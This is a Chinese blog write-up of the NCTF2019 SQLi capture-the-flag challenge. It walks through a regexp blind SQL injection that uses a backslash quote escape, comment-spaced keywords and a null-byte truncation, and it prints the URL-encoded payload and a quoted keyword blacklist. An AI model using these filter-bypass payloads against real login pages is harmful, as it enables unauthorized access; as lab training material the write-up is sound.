[NCTF2019]SQLi 详细做题过程

最新推荐文章于 2024-03-24 07:00:00 发布
最新推荐文章于 2024-03-24 07:00:00 发布
阅读量462 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyaowangchuan/article/details/114362816
版权

在这里插入图片描述直接给出了查询语句
离谱
简单试一下
在这里插入图片描述
果然
在这里插入图片描述
扫描目录
在这里插入图片描述

在这里插入图片描述
继续访问
在这里插入图片描述
只要密码对就给flag
由于单引号被禁用,使用 \ 转义and前面的那个单引号,使得 ‘’ and passwd=’ 形成闭合
构造passwd处为 ||/*1*/passwd/*2*/regexp/*3*/"^a";%00
用regexp查询passwd ^匹配字符串开头 %00截断后面的内容
但是不能在输入框直接提交,会被url encode 变为%2500被黑名单拦截
即为 username=\&passwd=||/**/passwd/**/regexp/**/"^a";%00
查询语句变为

sqlquery : select * from users where username='\' and passwd='||/**/passwd/**/regexp/**/"^a";

url编码一下再在后面加一个%00

username=%5c&passwd=%7c%7c%2f**%2fpasswd%2f**%2fregexp%2f**%2f%22%5ey%22%3b%00

可以看到会跳转到welcome.php
在这里插入图片描述
在这里插入图片描述
跑出密码
在这里插入图片描述
在这里插入图片描述

出flag

wuyaoooo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛历年题——从第一届到第十四届
2024NCTF部分题目资源包
02-06
比赛已经结束,请最终排名前26且符合条件者(目前是2023级就读)的选手将【详细】wp于24小时内(即2/5 21:00)发送至[email protected] 一血题目奖励我们会发放至注册邮箱Nu1L Team组织的官方纳新赛事,旨在选拔优秀...
[NCTF2019]SQLi
Sk1y的博客
01-22 941
[NCTF2019]SQLi 文章目录[NCTF2019]SQLi一点记录参考链接 robots.txt中有提示:hint.txt 查看hint.txt $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|ins
[NCTF2019]SQLi ---不会编程的崽
不会编程的崽的博客
03-24 730
过滤有点多哦,而且我还没放完。单引号被过滤了,一刀砍在大动脉。但是路堵了,不代表窗户也封了。思路的确是这个思路,不过常规盲注与常规注入关键字被过滤差不多,看了大佬wp,说重点在regexp上。因为是正则匹配,所以在脚本中,一定要过滤掉通配符("*","+","?而且这个passwd列名,是猜的。很直接哦,给出了sql查询语句。简单扫描一下,robots.txt还能访问。过滤了一些东西,而且只要密码对了就能拿到flag。含义:匹配当前表下,passwd列里的内容是否为YO或者yo。自己写的脚本有点烂,见谅。
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1253
BUUCTF记录贴
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
最新发布
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
RSA加密软件 (VC++,MFC程序实现)
05-27
RSA加密程序实现VC++ ,MFC 可以产生任意位数的大数素,可以作为毕业论文哈。也是学习RSA加密的好例子,可以学到很多的加密函数和加密算法,很多算法是很经典的 ,比如欧拉定理,费马定理,还有中国剩余定理等.........
[NCTF2019]SQLi(Regexp注入)
D.MIND 的博客
04-25 676
文章目录分析Regexp注入盲注脚本总结: 又是一道考验写python脚本的题目,python学的真不咋地,看师傅们的脚本才知道一些点改怎么写… 分析 查询语句: sqlquery : select * from users where username='' and passwd='' 一开始真的尝试很多感觉不好绕,后来意识到前面username处可以用反斜杠将SQL语句的单引号转义,再之后就没头绪了,因为实在过滤了很多,之后尝试了看看有没有hint信息,在robots.txt处找到,提示看hint.
[NCTF2019]SQLi 1&regexp注入
plant1234的博客
10-03 1295
发现为ture时返回Location: welcome.php。随便输入一个用户,用admin的密码登陆得到flag。并且当密码和admin密码相同时就能得到flag。可以利用bool盲注进行注入,爆破passwd。发现没有过滤 " 和 \。
[NCTF2019]SQLi-1||SQL注入
sinat_40572875的博客
11-23 432
采用的是正则表达式来获取flag的值,因此这里在select等关键字被过滤的情况下,这里也可以使用正则表达式来匹配admin的密码进而来获取flag值,确定获取密码的方式之后就需要确定注入点,来使用正则表达式来逐步获取密码的值,这里想到了对name中的第二个字符进行转义,使后面的' and passwd=成为name的内容,payload:name:\,passwd:||/**/1;脚本可以适当的修改延时时间,如果使用时报错,那就从新跑一下或修改下延时时间。payload不要带上了空格,空格也被过滤了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值